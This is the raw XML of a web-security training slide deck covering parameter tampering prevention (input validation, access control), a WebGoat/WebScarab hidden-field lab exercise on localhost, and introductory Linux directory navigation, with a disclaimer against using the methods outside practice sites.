            <a:off x="1656200" y="5660725"/>
            <a:ext cx="2289600" cy="503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Disclaimer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Shape 114"/>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Do </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>NOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> use the methods shown on websites not specified for web security practice.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ILLEGAL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="Shape 11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375" name="Shape 37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376" name="Shape 376"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="24450" r="15446" t="17108"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-101875"/>
            <a:ext cx="9144001" cy="70903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Shape 38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lgn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200"/>
              <a:t>Preventing Parameter Tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Shape 383"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1447800"/>
            <a:ext cx="8229600" cy="860400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Input Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-139700" lvl="0" marL="800100">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Shape 38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Graphical example showing an input validation routine applied to several code paths at once" id="385" name="Shape 385" title="Input Validation Applied to Multiple Code Paths"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="407225" y="2357456"/>
            <a:ext cx="8362375" cy="3859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Shape 391"/>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lgn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4200"/>
              <a:t>Preventing Parameter Tampering Cont’d</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Shape 392"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1524000"/>
            <a:ext cx="8229600" cy="868200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Shape 39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sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Shape 394"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537200" y="2560250"/>
            <a:ext cx="1419600" cy="1392300"/>
          </a:xfrm>
          <a:prstGeom prst="smileyFace">
            <a:avLst>
              <a:gd fmla="val 4653"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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="395" name="Shape 395"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154125" y="3280400"/>
            <a:ext cx="2051400" cy="22500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:srgbClr val="F3F3F3"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Shape 396"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537200" y="4557725"/>
            <a:ext cx="1419600" cy="1392300"/>
          </a:xfrm>
          <a:prstGeom prst="smileyFace">
            <a:avLst>
              <a:gd fmla="val 4653" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DD7E6B"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="397" name="Shape 397"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084325" y="5241850"/>
            <a:ext cx="2051400" cy="22500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:srgbClr val="F3F3F3"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="Shape 398"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="409400" y="4072588"/>
            <a:ext cx="1675200" cy="3651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399" name="Shape 399"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770750" y="3843988"/>
            <a:ext cx="1714500" cy="3651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36666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Shape 400"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="5873813"/>
            <a:ext cx="1714500" cy="365100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="36666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="980000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Shape 401"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4187050" y="2942725"/>
            <a:ext cx="1325400" cy="2606400"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd fmla="val 25000"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402" name="Shape 402"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1983950" y="2712650"/>
            <a:ext cx="1926600" cy="1021800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="36666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="403" name="Shape 403"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5547275" y="3294700"/>
            <a:ext cx="1239300" cy="12000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:srgbClr val="F3F3F3"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Shape 404"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6714900" y="2960175"/>
            <a:ext cx="1539000" cy="24972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405" name="Shape 405"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="3815050" y="3773725"/>
            <a:ext cx="2041800" cy="1230000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Shape 406"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="6397350" y="3766975"/>
            <a:ext cx="2198700" cy="1029600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="407" name="Shape 407"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5547275" y="5275900"/>
            <a:ext cx="1239300" cy="12000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:srgbClr val="F3F3F3"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Shape 408"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5298550" y="4600600"/>
            <a:ext cx="1325400" cy="1305000"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd fmla="val 7168" name="adj1"/>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Shape 414"/>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Activity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="Shape 415"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1036650"/>
            <a:ext cx="8686800" cy="5137200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Run webgoat.bat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://localhost/WebGoat/attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Start WebGoat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click on Parameter Tampering and start the Exploit Hidden Fields exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Make sure you have followed the tutorial at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/WebScarab_Getting_Started</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>to set it up.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Run WebScarab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="416" name="Shape 416"/>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i="0" lang="en-US" sz="4400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Topics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="423" name="Shape 423"/>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Crash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Parameter Tampering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFF00"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>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chemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US" sz="3200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Cross Site Scripting (XSS)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Linux File System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Shape 430"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1324300"/>
            <a:ext cx="8229600" cy="5129100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>File Structure: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>	/ - root directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-139700" lvl="0" marL="1714500" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> base of the file system where all directories (folders) and files are located. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-139700" lvl="0" marL="800100" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>   /home - home directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-139700" lvl="0" marL="800100" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>			    contains a folder for each user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-139700" lvl="0" marL="800100" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>   /root - directory of the root user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Shape 43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Shape 437"/>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Tree Structure in Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="Shape 438"/>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439" name="Shape 439"/>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440" name="Shape 440"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="35125"/>
            <a:ext cx="9144000" cy="6822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Shape 446"/>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sz="4000"/>
              <a:t>How to Navigate Between Directories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Shape 447"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1417650"/>
            <a:ext cx="8369100" cy="4893600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>cd - change directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>../ - parent directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>cd ../ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>	move up one directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="203200" rtl="0">
